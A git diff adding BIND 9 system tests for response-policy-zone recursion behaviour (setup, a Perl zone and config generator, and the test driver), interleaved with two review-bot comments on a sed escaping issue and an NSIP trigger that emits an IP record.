index 0000000..7c15414
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/setup.sh
@@ -0,0 +1,89 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# touch dnsrps-off to not test with DNSRPS + +set -e + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +USAGE="$0: [-DNx]" +DEBUG= +while getopts "DNx" c; do + case $c in + x) set -x; DEBUG=-x;; + D) TEST_DNSRPS="-D";; + N) NOCLEAN=set;; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi + +[ ${NOCLEAN:-unset} = unset ] && $SHELL clean.sh $DEBUG + +$PERL testgen.pl + +copy_setports ns1/named.conf.in ns1/named.conf + +copy_setports ns2/named.conf.header.in ns2/named.conf.header +copy_setports ns2/named.default.conf ns2/named.conf + +copy_setports ns3/named1.conf.in ns3/named.conf +copy_setports ns3/named2.conf.in ns3/named2.conf + +copy_setports ns4/named.conf.in ns4/named.conf + +# setup policy zones for a 64-zone test +i=1 +while test $i -le 64 +do + echo "\$TTL 60" > ns2/db.max$i.local + echo "@ IN SOA root.ns ns 1996072700 3600 1800 86400 60" >> ns2/db.max$i.local + echo " NS ns" >> ns2/db.max$i.local + echo "ns A 127.0.0.1" >> ns2/db.max$i.local + + j=1 + while test $j -le $i + do + echo "name$j A 10.53.0.$i" >> ns2/db.max$i.local + j=`expr $j + 1` + done + i=`expr $i + 1` +done + +# decide whether to test DNSRPS +$SHELL ../ckdnsrps.sh $TEST_DNSRPS $DEBUG +test -z "`grep 'dnsrps-enable yes' dnsrps.conf`" && TEST_DNSRPS= + +CWD=`pwd` +cat <<EOF >dnsrpzd.conf +PID-FILE $CWD/dnsrpzd.pid; + +include $CWD/dnsrpzd-license-cur.conf + +zone "policy" { type master; file "`pwd`/ns3/policy.db"; }; +EOF +sed -n -e 's/^ *//' -e 
"/zone.*.*master/s@file \"@&$CWD/ns2/@p" ns2/*.conf \ + >>dnsrpzd.conf + +# Run dnsrpzd to get the license and prime the static policy zones +if test -n "$TEST_DNSRPS"; then + DNSRPZD="`../rpz/dnsrps -p`" + "$DNSRPZD" -D./dnsrpzd.rpzf -S./dnsrpzd.sock -C./dnsrpzd.conf \ + -w 0 -dddd -L stdout >./dnsrpzd.run 2>&1 +fi diff --git a/bin/tests/system/rpzrecurse/testgen.pl b/bin/tests/system/rpzrecurse/testgen.pl new file mode 100755 index 0000000..399f343 --- /dev/null +++ b/bin/tests/system/rpzrecurse/testgen.pl 
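Review bot: The sed expression near the end of setup.sh that rewrites `file "` paths for dnsrpzd.conf interpolates `$CWD` into an `s@...@...@p` command, so a build directory whose path contains `@`, `&` or a backslash breaks the substitution or silently corrupts the generated paths. Escaping the value first avoids that: `CWD_ESC=$(printf '%s\n' "$CWD" | sed 's/[@&\\]/\\&/g')`, then use `$CWD_ESC` inside the sed expression in place of `$CWD`. On style, the here-document just above mixes `$CWD` and a second `` `pwd` `` call for the same directory; using `$CWD` for both keeps the generated file consistent.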
@@ -0,0 +1,343 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +my $boilerplate_header = <<'EOB'; +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { +EOB + +my $no_option = <<'EOB'; + } nsdname-enable yes nsip-enable yes; + + # policy zones to be tested +EOB + +my $qname_wait_recurse = <<'EOB'; + } nsdname-enable yes nsip-enable yes qname-wait-recurse no; + + # policy zones to be tested +EOB + +my $boilerplate_end = <<'EOB'; +}; +EOB + +my $policy_option = $qname_wait_recurse; + +my $serialnum = "1"; +my $policy_zone_header = <<'EOH'; +$TTL 60 +@ IN SOA root.ns ns SERIAL 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +EOH + +sub policy_client_ip { + return "32.1.0.0.127.rpz-client-ip CNAME .\n"; +} + +sub policy_qname { + my $query_nbr = shift; + return sprintf "q%02d.l2.l1.l0 CNAME .\n", $query_nbr; +} + +sub policy_ip { + return "32.255.255.255.255.rpz-ip CNAME .\n"; +} + +sub policy_nsdname { + return "ns.example.org.rpz-nsdname CNAME .\n"; +} + +sub policy_nsip { + return "32.255.255.255.255.rpz-ip CNAME .\n"; +} + +my %static_triggers = ( + 'client-ip' => \&policy_client_ip, + 'ip' => \&policy_ip, + 'nsdname' => \&policy_nsdname, + 'nsip' => \&policy_nsip, +); + +sub mkconf { + my $case_id = shift; + my $n_queries = shift; + + { # generate the query list + my $query_list_filename = "ns2/$case_id.queries"; + my $query_list_fh; + + open $query_list_fh, ">$query_list_filename" or die; + + for( my $i = 1; $i <= 
$n_queries; $i++ ) { + print $query_list_fh sprintf "q%02d.l2.l1.l0\n", $i; + } + } + + my @zones; + + { # generate the conf file + my $conf_filename = "ns2/named.$case_id.conf"; + + my $conf_fh; + + open $conf_fh, ">$conf_filename" or die; + + print $conf_fh $boilerplate_header; + + my $zone_seq = 0; + + @zones = map { + [ + sprintf( "$case_id.%02d.policy.local", $zone_seq++ ), + $_, + ]; + } @_; + + print $conf_fh map { qq{ zone "$_->[0]";\n} } @zones; + + print $conf_fh $policy_option; + + print $conf_fh map { qq{ zone "$_->[0]" { type master; file "db.$_->[0]"; };\n} } @zones; + + print $conf_fh $boilerplate_end; + } + + # generate the policy zone contents + foreach my $policy_zone_info( @zones ) { + my $policy_zone_name = $policy_zone_info->[0]; + my $policy_zone_contents = $policy_zone_info->[1]; + + my $policy_zone_filename = "ns2/db.$policy_zone_name"; + my $policy_zone_fh; + + open $policy_zone_fh, ">$policy_zone_filename" or die; + + my $header = $policy_zone_header; + $header =~ s/SERIAL/$serialnum/; + print $policy_zone_fh $header; + + foreach my $trigger( @$policy_zone_contents ) { + if( exists $static_triggers{$trigger} ) { + # matches a trigger type with a static value + print $policy_zone_fh $static_triggers{$trigger}->(); + } + else { + # a qname trigger, where what was specified is the query number it should match + print $policy_zone_fh policy_qname( $trigger ); + } + } + } +} + +mkconf( + '1a', + 1, + [ 'client-ip' ], +); + +mkconf( + '1b', + 2, + [ 1 ], +); + +mkconf( + '1c', + 1, + [ 'client-ip', 2 ], +); + +mkconf( + '2a', + 33, + map { [ $_ ]; } 1 .. 
32 +); + +mkconf( + '3a', + 1, + [ 'ip' ], +); + +mkconf( + '3b', + 1, + [ 'nsdname' ], +); + +mkconf( + '3c', + 1, + [ 'nsip' ], +); + +mkconf( + '3d', + 2, + [ 'ip', 1 ] +); + +mkconf( + '3e', + 2, + [ 'nsdname', 1 ] +); + +mkconf( + '3f', + 2, + [ 'nsip', 1 ] +); + +{ + my $seq_code = 'aa'; + my $seq_nbr = 0; + + while( $seq_nbr < 32 ) { + + mkconf( + "4$seq_code", + 33, + ( map { [ $_ ]; } 1 .. $seq_nbr ), + [ 'ip', $seq_nbr + 2 ], + ( map { [ $_ + 2 ]; } ($seq_nbr + 1) .. 31 ), + ); + + $seq_code++; + $seq_nbr++; + } +} + +mkconf( + '5a', + 6, + [ 1 ], + [ 2, 'ip' ], + [ 4 ], + [ 5, 'ip' ], + [ 6 ], +); + +$policy_option = $no_option; + +mkconf( + '6a', + 0, + [ ], +); + +$serialnum = "2"; +mkconf( + '6b', + 0, + [ 'nsdname' ], +); + +$serialnum = "3"; +mkconf( + '6c', + 0, + [ ], +); + +__END__ + +0x01 - has client-ip + 32.1.0.0.127.rpz-client-ip CNAME . +0x02 - has qname + qX.l2.l1.l0 CNAME . +0x10 - has ip + 32.255.255.255.255.rpz-ip CNAME . +0x20 - has nsdname + ns.example.org.rpz-nsdname CNAME . +0x40 - has nsip + 32.255.255.255.255.rpz-nsip CNAME . + +$case.$seq.policy.local + +case 1a = 0x01 + .q01 = (00,0x01)=-r +case 1b = 0x02 + .q01 = (00,0x02)=-r + .q02 = (--,----)=+r +case 1c = 0x03 + .q01 = (00,0x01)=-r + +case 2a = 0x03{32} + .q01 = (00,0x02)=-r + .q02 = (01,0x02)=-r + ... + .q31 = (30,0x02)=-r + .q32 = (31,0x02)=-r + .q33 = (--,----)=+r + +case 3a = 0x10 + .q01 = (00,0x10)=+r +case 3b = 0x20 + .q01 = (00,0x20)=+r +case 3c = 0x40 + .q01 = (00,0x40)=+r +case 3d = 0x12 + .q01 = (00,0x10)=+r + .q02 = (00,0x02)=-r +case 3e = 0x22 + .q01 = (00,0x20)=+r + .q02 = (00,0x02)=-r +case 3f = 0x42 + .q01 = (00,0x40)=+r + .q02 = (00,0x02)=-r + +case 4aa = 0x12,0x02{31} + .q01 = (00,0x10)=+r + .q02 = (00,0x02)=-r + .q03 = (01,0x02)=+r + ... + .q32 = (30,0x02)=+r + .q33 = (31,0x02)=+r +case 4__ = 0x02{n(1->30)},0x12,0x02{31-n} + .q01 = (00,0x02)=-r + ... + .q(n+1) = (n,0x10)=+r + .q(n+2) = (n,0x02)=-r + ... 
+ .q33 = (31,0x02)=+r +case 4bf = 0x02{31},0x12 + .q01 = (00,0x02)=-r + .q02 = (01,0x02)=-r + ... + .q31 = (30,0x02)=-r + .q32 = (31,0x10)=+r + .q33 = (31,0x02)=-r + +case 5a = 0x02,0x12,0x02,0x12,0x02 + .q01 = (00,0x02)=-r + .q02 = (01,0x02)=-r + .q03 = (01,0x10)=+r + .q04 = (02,0x02)=+r + .q05 = (03,0x02)=+r + .q06 = (04,0x02)=+r + diff --git a/bin/tests/system/rpzrecurse/tests.sh b/bin/tests/system/rpzrecurse/tests.sh new file mode 100644 index 0000000..950b610 --- /dev/null +++ b/bin/tests/system/rpzrecurse/tests.sh 
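Review bot: `policy_nsip` returns the same record as `policy_ip` (`32.255.255.255.255.rpz-ip CNAME .`), so the zones generated for cases 3c and 3f contain an IP trigger rather than an NSIP trigger, while the table after `__END__` documents 0x40 as `32.255.255.255.255.rpz-nsip CNAME .`. The return should read `return "32.255.255.255.255.rpz-nsip CNAME .\n";`. The 3c and 3f expectations in tests.sh currently pass against an rpz-ip record and need re-checking after that change. Separately, the three `open ... or die;` calls in `mkconf` use two-argument open and die without `$!`; a form like `open my $fh, '>', $name or die "$name: $!";` gives a usable message when ns2/ is not writable.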
@@ -0,0 +1,545 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# touch dnsrps-off to not test with DNSRPS +# touch dnsrps-only to not test with classic RPZ + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +t=0 + +DEBUG= +ARGS= + +USAGE="$0: [-xS]" +while getopts "xS:" c; do + case $c in + x) set -x; DEBUG=-x; ARGS="$ARGS -x";; + S) SAVE_RESULTS=-S; ARGS="$ARGS -S";; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi +# really quit on control-C +trap 'exit 1' 1 2 15 + +DNSRPSCMD=../rpz/dnsrps +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# $1 = test name (such as 1a, 1b, etc. for which named.$1.conf exists) +run_server() { + TESTNAME=$1 + + echo_i "stopping resolver" + stop_server --use-rndc --port ${CONTROLPORT} ns2 + + sleep 1 + + echo_i "starting resolver using named.$TESTNAME.conf" + cp -f ns2/named.$TESTNAME.conf ns2/named.conf + start_server --noclean --restart --port ${PORT} ns2 + sleep 3 +} + +run_query() { + TESTNAME=$1 + LINE=$2 + + NAME=`sed -n -e "$LINE,"'$p' ns2/$TESTNAME.queries | head -n 1` + $DIG $DIGOPTS $NAME a @10.53.0.2 -p ${PORT} -b 127.0.0.1 > dig.out.${t} + grep "status: SERVFAIL" dig.out.${t} > /dev/null 2>&1 && return 1 + return 0 +} + +# $1 = test name (such as 1a, 1b, etc. 
for which $1.queries exists) +# $2 = line number in query file to test (the name to query is taken from this line) +expect_norecurse() { + TESTNAME=$1 + LINE=$2 + + NAME=`sed -n -e "$LINE,"'$p' ns2/$TESTNAME.queries | head -n 1` + t=`expr $t + 1` + echo_i "testing $NAME doesn't recurse (${t})" + add_test_marker 10.53.0.2 + run_query $TESTNAME $LINE || { + echo_i "test ${t} failed" + status=1 + } +} + +# $1 = test name (such as 1a, 1b, etc. for which $1.queries exists) +# $2 = line number in query file to test (the name to query is taken from this line) +expect_recurse() { + TESTNAME=$1 + LINE=$2 + + NAME=`sed -n -e "$LINE,"'$p' ns2/$TESTNAME.queries | head -n 1` + t=`expr $t + 1` + echo_i "testing $NAME recurses (${t})" + add_test_marker 10.53.0.2 + run_query $TESTNAME $LINE && { + echo_i "test ${t} failed" + status=1 + } +} + +add_test_marker() { + for ns in $@ + do + $RNDCCMD $ns null ---- test ${t} ---- + done +} + +for mode in native dnsrps; do + status=0 + case $mode in + native) + if [ -e dnsrps-only ] ; then + echo_i "'dnsrps-only' found: skipping native RPZ sub-test" + continue + else + echo_i "running native RPZ sub-test" + fi + ;; + dnsrps) + if [ -e dnsrps-off ] ; then + echo_i "'dnsrps-off' found: skipping DNSRPS sub-test" + continue + fi + echo_i "attempting to configure servers with DNSRPS..." 
+ stop_server --use-rndc --port ${CONTROLPORT} + $SHELL ./setup.sh -N -D $DEBUG + sed -n 's/^## //p' dnsrps.conf | cat_i + if grep '^#fail' dnsrps.conf >/dev/null; then + echo_i "exit status: 1" + exit 1 + fi + if grep '^#skip' dnsrps.conf > /dev/null; then + echo_i "DNSRPS sub-test skipped" + continue + else + echo_i "running DNSRPS sub-test" + start_server --noclean --restart --port ${PORT} + sleep 3 + fi + ;; + esac + + # show whether and why DNSRPS is enabled or disabled + sed -n 's/^## //p' dnsrps.conf | cat_i + + t=`expr $t + 1` + echo_i "testing that l1.l0 exists without RPZ (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS l1.l0 ns @10.53.0.2 -p ${PORT} > dig.out.${t} + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "testing that l2.l1.l0 returns SERVFAIL without RPZ (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS l2.l1.l0 ns @10.53.0.2 -p ${PORT} > dig.out.${t} + grep "status: SERVFAIL" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + + # Group 1 + run_server 1a + expect_norecurse 1a 1 + run_server 1b + expect_norecurse 1b 1 + expect_recurse 1b 2 + run_server 1c + expect_norecurse 1c 1 + + # Group 2 + run_server 2a + for n in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 \ + 21 22 23 24 25 26 27 28 29 30 31 32 + do + expect_norecurse 2a $n + done + expect_recurse 2a 33 + + # Group 3 + run_server 3a + expect_recurse 3a 1 + run_server 3b + expect_recurse 3b 1 + run_server 3c + expect_recurse 3c 1 + run_server 3d + expect_norecurse 3d 1 + expect_recurse 3d 2 + run_server 3e + expect_norecurse 3e 1 + expect_recurse 3e 2 + run_server 3f + expect_norecurse 3f 1 + expect_recurse 3f 2 + + # Group 4 + testlist="aa ap bf" + values="1 16 32" + # Uncomment the following to test every skip value instead of + # only a sample of values + # + #testlist="aa ab ac ad ae af ag ah ai aj ak al am an ao ap \ + # aq ar as at au av aw ax ay az ba bb bc bd 
be bf" + #values="1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 \ + # 21 22 23 24 25 26 27 28 29 30 31 32" + set -- $values + for n in $testlist; do + run_server 4$n + ni=$1 + t=`expr $t + 1` + echo_i "testing that ${ni} of 33 queries skip recursion (${t})" + add_test_marker 10.53.0.2 + c=0 + for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 \ + 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 + do + run_query 4$n $i + c=`expr $c + $?` + done + skipped=`expr 33 - $c` + if [ $skipped != $ni ]; then + echo_i "test $t failed (actual=$skipped, expected=$ni)" + status=1 + fi + shift + done + + # Group 5 + run_server 5a + expect_norecurse 5a 1 + expect_norecurse 5a 2 + expect_recurse 5a 3 + expect_recurse 5a 4 + expect_recurse 5a 5 + expect_recurse 5a 6 + + if [ ! "$CYGWIN" -o -n "$PSSUSPEND" ] + then + # Group 6 + echo_i "check recursive behavior consistency during policy update races" + run_server 6a + sleep 1 + t=`expr $t + 1` + echo_i "running dig to cache CNAME record (${t})" + add_test_marker 10.53.0.1 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org CNAME > dig.out.${t} + sleep 1 + echo_i "suspending authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND $PID + else + $KILL -STOP $PID + fi + echo_i "adding an NSDNAME policy" + cp ns2/db.6a.00.policy.local ns2/saved.policy.local + cp ns2/db.6b.00.policy.local ns2/db.6a.00.policy.local + $RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT} reload 6a.00.policy.local 2>&1 | sed 's/^/ns2 /' | cat_i + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + t=`expr $t + 1` + echo_i "running dig to follow CNAME (blocks, so runs in the background) (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org A +time=5 > dig.out.${t} & + sleep 1 + echo_i "removing the NSDNAME policy" + cp ns2/db.6c.00.policy.local ns2/db.6a.00.policy.local + $RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT} reload 
6a.00.policy.local 2>&1 | sed 's/^/ns2 /' | cat_i + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + echo_i "resuming authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND -r $PID + else + $KILL -CONT $PID + fi + add_test_marker 10.53.0.1 + for n in 1 2 3 4 5 6 7 8 9 + do + sleep 1 + [ -s dig.out.${t} ] || continue + grep "status: .*," dig.out.${t} > /dev/null 2>&1 && break + done + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + + echo_i "check recursive behavior consistency during policy removal races" + cp ns2/saved.policy.local ns2/db.6a.00.policy.local + run_server 6a + sleep 1 + t=`expr $t + 1` + echo_i "running dig to cache CNAME record (${t})" + add_test_marker 10.53.0.1 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org CNAME > dig.out.${t} + sleep 1 + echo_i "suspending authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND $PID + else + $KILL -STOP $PID + fi + echo_i "adding an NSDNAME policy" + cp ns2/db.6b.00.policy.local ns2/db.6a.00.policy.local + $RNDC -c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT} reload 6a.00.policy.local 2>&1 | sed 's/^/ns2 /' | cat_i + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + t=`expr $t + 1` + echo_i "running dig to follow CNAME (blocks, so runs in the background) (${t})" + add_test_marker 10.53.0.2 + $DIG $DIGOPTS @10.53.0.2 -p ${PORT} www.test.example.org A +time=5 > dig.out.${t} & + sleep 1 + echo_i "removing the policy zone" + cp ns2/named.default.conf ns2/named.conf + rndc_reconfig ns2 10.53.0.2 + test -f dnsrpzd.pid && $KILL -USR1 `cat dnsrpzd.pid` + sleep 1 + echo_i "resuming authority server" + PID=`cat ns1/named.pid` + if [ "$CYGWIN" ] + then + $PSSUSPEND -r $PID + else + $KILL -CONT $PID + fi + add_test_marker 10.53.0.1 + for n in 1 2 3 4 5 6 7 8 9; do + sleep 1 + [ -s dig.out.${t} ] || continue + grep "status: .*," dig.out.${t} > /dev/null 2>&1 
&& break + done + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test ${t} failed" + status=1 + } + fi + + # Check maximum number of RPZ zones (64) + t=`expr $t + 1` + echo_i "testing maximum number of RPZ zones (${t})" + add_test_marker 10.53.0.2 + run_server max + i=1 + while test $i -le 64 + do + $DIG $DIGOPTS name$i a @10.53.0.2 -p ${PORT} -b 10.53.0.1 > dig.out.${t}.${i} + grep "^name$i.[ ]*[0-9]*[ ]*IN[ ]*A[ ]*10.53.0.$i" dig.out.${t}.${i} > /dev/null 2>&1 || { + echo_i "test $t failed: didn't get expected answer from policy zone $i" + status=1 + } + i=`expr $i + 1` + done + + # Check CLIENT-IP behavior + t=`expr $t + 1` + echo_i "testing CLIENT-IP behavior (${t})" + add_test_marker 10.53.0.2 + run_server clientip + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.4 > dig.out.${t} + grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + grep "^l2.l1.l0.[ ]*[0-9]*[ ]*IN[ ]*A[ ]*10.53.0.2" dig.out.${t} > /dev/null 2>&1 || { + echo_i "test $t failed: didn't get expected answer" + status=1 + } + + # Check CLIENT-IP behavior #2 + t=`expr $t + 1` + echo_i "testing CLIENT-IP behavior #2 (${t})" + add_test_marker 10.53.0.2 + run_server clientip2 + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.1 > dig.out.${t}.1 + grep "status: SERVFAIL" dig.out.${t}.1 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.2 > dig.out.${t}.2 + grep "status: NXDOMAIN" dig.out.${t}.2 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.3 > dig.out.${t}.3 + grep "status: NOERROR" dig.out.${t}.3 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + grep "^l2.l1.l0.[ ]*[0-9]*[ ]*IN[ ]*A[ ]*10.53.0.1" dig.out.${t}.3 > /dev/null 2>&1 || { + echo_i "test $t failed: didn't get expected answer" + status=1 + 
} + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.4 > dig.out.${t}.4 + grep "status: SERVFAIL" dig.out.${t}.4 > /dev/null 2>&1 || { + echo_i "test $t failed: query failed" + status=1 + } + + # Check RPZ log clause + t=`expr $t + 1` + echo_i "testing RPZ log clause (${t})" + add_test_marker 10.53.0.2 + run_server log + cur=`awk 'BEGIN {l=0} /^/ {l++} END { print l }' ns2/named.run` + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.4 > dig.out.${t} + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.3 >> dig.out.${t} + $DIG $DIGOPTS l2.l1.l0 a @10.53.0.2 -p ${PORT} -b 10.53.0.2 >> dig.out.${t} + sed -n "$cur,"'$p' < ns2/named.run | grep "view recursive: rpz CLIENT-IP Local-Data rewrite l2.l1.l0/A/IN via 32.4.0.53.10.rpz-client-ip.log1" > /dev/null && { + echo_ic "failed: unexpected rewrite message for policy zone log1 was logged" + status=1 + } + sed -n "$cur,"'$p' < ns2/named.run | grep "view recursive: rpz CLIENT-IP Local-Data rewrite l2.l1.l0/A/IN via 32.3.0.53.10.rpz-client-ip.log2" > /dev/null || { + echo_ic "failed: expected rewrite message for policy zone log2 was not logged" + status=1 + } + sed -n "$cur,"'$p' < ns2/named.run | grep "view recursive: rpz CLIENT-IP Local-Data rewrite l2.l1.l0/A/IN via 32.2.0.53.10.rpz-client-ip.log3" > /dev/null || { + echo_ic "failed: expected rewrite message for policy zone log3 was not logged" + status=1 + } + + # Check wildcard behavior + + t=`expr $t + 1` + echo_i "testing wildcard behavior with 1 RPZ zone (${t})" + add_test_marker 10.53.0.2 + run_server wildcard1 + $DIG $DIGOPTS www.test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NXDOMAIN" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NXDOMAIN" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "testing wildcard behavior with 2 RPZ zones (${t})" 
+ add_test_marker 10.53.0.2 + run_server wildcard2 + $DIG $DIGOPTS www.test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NXDOMAIN" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NXDOMAIN" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "testing wildcard behavior with 1 RPZ zone and no non-wildcard triggers (${t})" + add_test_marker 10.53.0.2 + run_server wildcard3 + $DIG $DIGOPTS www.test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NXDOMAIN" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS test1.example.net a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NOERROR" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + # Check for invalid prefix length error + t=`expr $t + 1` + echo_i "testing for invalid prefix length error (${t})" + add_test_marker 10.53.0.2 + run_server invalidprefixlength + grep "invalid rpz IP address \"1000.4.0.53.10.rpz-client-ip.invalidprefixlength\"; invalid prefix length of 1000$" ns2/named.run > /dev/null || { + echo_ic "failed: expected that invalid prefix length error would be logged" + status=1 + } + + t=`expr $t + 1` + echo_i "testing wildcard passthru before explicit drop (${t})" + add_test_marker 10.53.0.2 + run_server wildcard4 + $DIG $DIGOPTS example.com a @10.53.0.2 -p ${PORT} > dig.out.${t}.1 + grep "status: NOERROR" dig.out.${t}.1 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + $DIG $DIGOPTS www.example.com a @10.53.0.2 -p ${PORT} > dig.out.${t}.2 + grep "status: NOERROR" dig.out.${t}.2 > /dev/null || { + echo_i "test ${t} failed" + status=1 + } + + t=`expr $t + 1` + echo_i "checking 'nsip-wait-recurse no' is faster than 'nsip-wait-recurse yes' ($t)" + add_test_marker 10.53.0.2 10.53.0.3 + echo_i "timing 
'nsip-wait-recurse yes' (default)" + ret=0 + t1=`$PERL -e 'print time()."\n";'` + $DIG -p ${PORT} @10.53.0.3 foo.child.example.tld a > dig.out.yes.$t + t2=`$PERL -e 'print time()."\n";'` + p1=`expr $t2 - $t1` + echo_i "elasped time $p1 seconds" + + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} flush + copy_setports ns3/named2.conf.in ns3/named.conf + nextpart ns3/named.run > /dev/null + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} reload > /dev/null + wait_for_log 20 "rpz: policy: reload done" ns3/named.run || ret=1 + + echo_i "timing 'nsip-wait-recurse no'" + t3=`$PERL -e 'print time()."\n";'` + $DIG -p ${PORT} @10.53.0.3 foo.child.example.tld a > dig.out.no.$t + t4=`$PERL -e 'print time()."\n";'` + p2=`expr $t4 - $t3` + echo_i "elasped time $p2 seconds" + + if test $p1 -le $p2; then ret=1; fi + if test $ret != 0; then echo_i "failed"; fi + status=`expr $status + $ret` + + [ $status -ne 0 ] && pf=fail || pf=pass + case $mode in + native) + native=$status + echo_i "status (native RPZ sub-test): $status ($pf)";; + dnsrps) + dnsrps=$status + echo_i "status (DNSRPS sub-test): $status ($pf)";; + *) echo_i "invalid test mode";; + esac +done +status=`expr ${native:-0} + ${dnsrps:-0}` + +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rrchecker/classlist.good b/bin/tests/system/rrchecker/classlist.good new file mode 100644 index 0000000..f0fff1a --- /dev/null +++ b/bin/tests/system/rrchecker/classlist.good @@ -0,0 +1,3 @@ +IN +CH +HS diff --git a/bin/tests/system/rrchecker/clean.sh b/bin/tests/system/rrchecker/clean.sh new file mode 100644 index 0000000..166247d --- /dev/null +++ b/bin/tests/system/rrchecker/clean.sh 
